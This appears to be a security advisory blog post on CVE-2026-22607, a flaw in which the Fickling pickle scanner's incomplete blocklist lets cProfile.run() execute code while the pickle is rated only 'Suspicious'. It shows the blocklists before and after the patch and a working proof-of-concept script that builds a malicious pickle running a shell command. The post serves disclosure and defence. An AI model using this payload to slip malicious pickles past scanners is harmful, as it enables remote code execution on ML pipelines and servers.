Feb 23, 2026·5 min read·1 visit
Fickling missed `cProfile` and other modules in its blocklist. Attackers can use `cProfile.run()` to execute code inside a pickle. Fickling flags this as merely 'Suspicious', allowing the exploit to slip past automated security checks expecting an 'Overtly Malicious' verdict.
Fickling, a specialized tool designed to analyze and decompile Python pickles safely, contained a critical oversight in its blocklist logic. By failing to flag the `cProfile` module and other standard libraries as dangerous, Fickling allowed attackers to craft malicious pickles that execute arbitrary code while only being flagged as "SUSPICIOUS" rather than "OVERTLY_MALICIOUS." This effectively bypasses the security gates relying on Fickling's severity ratings.
Python's pickle module is notoriously dangerous. The documentation itself practically screams "DO NOT USE ON UNTRUSTED DATA." Yet, the world runs on serialized data, and machine learning models (often distributed as pickles) are everywhere. Enter Fickling, a tool by Trail of Bits designed to decompile, analyze, and—crucially—judge the safety of these binary blobs. Ideally, it acts as a bomb squad robot: it x-rays the package and tells you if it's going to blow up your server.
But here's the irony: building a safety scanner for a format that is essentially a stack-based virtual machine is incredibly hard. You have to anticipate every way an attacker might invoke code execution. In CVE-2026-22607, we see what happens when the scanner knows about the front door (os.system) and the back door (subprocess.Popen), but forgets that the house also has a doggy door labeled cProfile. This vulnerability isn't a buffer overflow; it's a logic flaw where a "profiling tool" becomes a weapon of mass destruction.
Fickling works by symbolically executing the pickle bytecode to build an Abstract Syntax Tree (AST). It then runs heuristics over this AST to detect "unsafe" imports or calls. This is a classic blocklist approach (CWE-184). The developers correctly identified that os, sys, and subprocess are dangerous. If a pickle tries to import os and call system, Fickling screams "OVERTLY_MALICIOUS."
However, Python's standard library is massive and full of gadgets. The flaw here was the omission of cProfile. To a developer, cProfile is a tool for optimizing code performance. To a hacker, cProfile.run(command) is just exec(command) with a fancy mustache. Because cProfile wasn't on the UNSAFE_IMPORTS list, Fickling saw it, shrugged, and let it pass. It might flag the pickle as SUSPICIOUS due to other heuristics (like weird variable usage), but in many automated pipelines, SUSPICIOUS is treated as "probably fine," whereas OVERTLY_MALICIOUS is "burn it with fire." This distinction is the difference between a blocked attack and a shell on your server.
Let's look at the "security" logic before the patch. The UnsafeImports analysis relied on a hardcoded set of module names. If the module wasn't in the set, it wasn't unsafe.
Vulnerable Code (Concept):
UNSAFE_IMPORTS = {
"os", "sys", "subprocess", "shutil", ...
}
if node.module in UNSAFE_IMPORTS:
severity = OVERTLY_MALICIOUSThe patch in version 0.1.7 didn't just add cProfile; it realized the list was woefully incomplete. They added runpy (executes files), ctypes (loads C libraries), pydoc (locates objects), and importlib. Furthermore, they hardened the matching logic.
Patched Code (Simplified):
# Expanded blocklist
UNSAFE_IMPORTS = {
"os", "sys", "subprocess", "cProfile", "runpy",
"ctypes", "pydoc", "importlib", "code", "multiprocessing", ...
}
# Better matching logic to catch submodules
if any(comp in UNSAFE_IMPORTS for comp in node.module.split('.')):
severity = OVERTLY_MALICIOUSThey also fixed a visibility gap where builtins weren't generating AST nodes, meaning attacks using builtins.__import__ were effectively invisible to the analyzer.
To exploit this, we don't need memory corruption. We just need to speak the language of the Pickle Virtual Machine (PVM). We want to invoke cProfile.run('print("PWNED")'). In pickle logic, we load the global cProfile.run, push a string argument, and call REDUCE.
Here is what that looks like in a Python script generating the payload:
import pickle
import pickletools
from fickling.fickle import Pickled, op
# The payload string is passed to cProfile.run(), which passes it to exec()
payload_code = "import os; os.system('id')"
# Constructing the malicious pickle manually using Fickling's own tools
pickled = Pickled([
op.Proto.create(5),
op.ShortBinUnicode("cProfile"),
op.Memoize(),
op.ShortBinUnicode("run"),
op.Memoize(),
op.StackGlobal(), # Resolves cProfile.run
op.Memoize(),
op.ShortBinUnicode(payload_code),
op.Memoize(),
op.TupleOne(), # Creates a tuple of arguments: (payload_code,)
op.Memoize(),
op.Reduce(), # Calls cProfile.run(payload_code)
op.Memoize(),
op.Stop(),
])
print(f"Generated payload length: {len(pickled.dumps())}")
# When Fickling <= 0.1.6 scans this, it returns Severity.SUSPICIOUS
# When Python unpickles this, it executes the code.The beauty of this exploit is its simplicity. It uses standard library features exactly as designed, just in a context the security tool deemed "safe enough."
Why does the distinction between SUSPICIOUS and OVERTLY_MALICIOUS matter? Because of alert fatigue and automated policy.
Security tools like Fickling are often used in pipelines (e.g., scanning uploaded ML models). If Fickling flags everything as SUSPICIOUS (which can happen with complex, benign pickles), operators might tune their policy to only block OVERTLY_MALICIOUS findings. By abusing cProfile, an attacker slides under this threshold.
The impact is full Remote Code Execution (RCE) with the privileges of the process unpickling the data. In the context of ML pipelines, this often means access to GPU clusters, training data, or model weights. The CVSS score is high (7.8) for a reason—it's a complete bypass of the tool's core value proposition.
The remediation is straightforward: Update to Fickling 0.1.7 or later.
The fix involves a more comprehensive blocklist and structural changes to how imports are analyzed. If you cannot update, you must treat any pickle flagged as SUSPICIOUS by Fickling as potentially lethal, specifically looking for imports of cProfile, runpy, or ctypes in the analysis output.
> [!NOTE]
> Developer Lesson: Blocklists are hard. In dynamic languages like Python, there is almost always another way to execute code. eval, exec, timeit, cProfile, pdb, code.InteractiveConsole... the list is endless. If you are building a sandbox or analyzer, assume your blocklist is incomplete.
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
fickling Trail of Bits | <= 0.1.6 | 0.1.7 |
| Attribute | Detail |
|---|---|
| CWE | CWE-184 (Incomplete List of Disallowed Inputs) |
| Attack Vector | Local / Network (depending on pickle source) |
| CVSS v3.1 | 7.8 (High) |
| CVSS v4.0 | 8.9 (High) |
| Impact | Security Bypass leading to RCE |
| Exploit Status | PoC Available |